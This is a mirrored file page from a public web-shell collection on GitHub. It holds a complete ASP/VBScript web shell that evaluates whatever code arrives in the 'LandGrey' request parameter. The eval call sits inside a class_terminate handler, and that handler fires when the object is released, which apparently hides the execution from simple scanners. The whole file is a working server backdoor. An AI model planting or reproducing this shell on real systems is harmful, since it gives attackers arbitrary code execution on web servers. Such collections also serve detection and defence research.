mirror of
https://github.com/tennc/webshell
synced 2024-11-22 11:13:03 +00:00
10 lines
148 B
Text
10 lines
148 B
Text
|
<%
|
||
|
Class LandGrey
|
||
|
Private Sub class_terminate
|
||
|
eval (request("LandGrey"))
|
||
|
End Sub
|
||
|
End Class
|
||
|
|
||
|
Set X = New LandGrey
|
||
|
Set X = Nothing
|
||
|
%>
|